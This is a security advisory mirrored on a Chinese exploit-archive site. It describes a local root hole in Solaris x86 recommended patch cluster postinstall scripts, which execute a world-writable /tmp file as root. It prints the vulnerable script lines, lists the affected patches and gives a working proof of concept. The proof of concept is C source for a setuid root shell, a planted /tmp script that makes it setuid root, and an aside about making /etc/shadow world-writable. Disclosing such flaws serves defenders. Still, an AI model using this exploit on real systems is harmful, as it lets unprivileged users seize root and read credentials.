首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Solaris Recommended Patch Cluster 6/19 Local Root
来源:@_larry0 作者:Cashdollar 发布时间:2013-07-09   
Solaris Recommended Patch Cluster 6/19 local root on x86

Larry W. Cashdollar
7/3/2013
@_larry0
If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.
Local root:
Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.
./144751-01/SUNWos86r/install/postinstall 


782          if [ -s /tmp/disketterc.d/rcs9.sh ]
   783          then
   784                  /sbin/sh /tmp/disketterc.d/rcs9.sh "post"
   785          fi

Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?
804  # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)
   805  TMPFILE=/tmp/ncrstmp
   806  sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFIL
E
   807  cp $TMPFILE ${BASEDIR}/etc/driver_aliases


./141445-09/SUNWos86r/install/postinstall


656          if [ -s /tmp/disketterc.d/rcs9.sh ]
   657          then
   658                  /sbin/sh /tmp/disketterc.d/rcs9.sh "post"
   659          fi


Well, it looks like you've got a few chances to abuse it:


larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \;
./144501-19/SUNWos86r/install/postinstall
./141445-09/SUNWos86r/install/postinstall
./142059-01/SUNWos86r/install/postinstall
./147148-26/SUNWos86r/install/postinstall
./127128-11/SUNWos86r/install/postinstall
./148889-03/SUNWos86r/install/postinstall
./142910-17/SUNWos86r/install/postinstall
./144751-01/SUNWos86r/install/postinstall

Psuedo PoC:
Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.
chmod 666 /etc/shadow would be easy.
PoC:
larry@slowaris:~$ cat setuid.c 
#include 
#include 
int
main (void)
{
  char *shell[2];
  shell[0] = "sh";
  shell[1] = NULL;
  setregid (0, 0);
  setreuid (0, 0);
  execve ("/bin/sh", shell, NULL);
  return(0);
}
gcc -o /tmp/r00t setuid.c
larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t
After patches have been applied:
larry@slowaris:~$ /tmp/r00t
# id
uid=0(root) gid=0(root)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Google Chrome 25.0.1364.152 HT
·ERS Viewer 2013 ERS File Handl
·AOL Instant Messenger 8.0.1.5
·SikaBoom Remote Buffer overflo
·OpenNetAdmin 13.03.01 Remote C
·Apache CXF prior to 2.5.10, 2.
·Adobe Reader X 10.1.4.38 - BMP
·Jolix Media Player 1.1.0 (.m3u
·InstantCMS 1.6 Remote PHP Code
·nginx 1.3.9/1.4.0 x86 Brute Fo
·Opera 12.15 Denial Of Service
·Ultra Mini HTTPD 1.21 - Stack
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved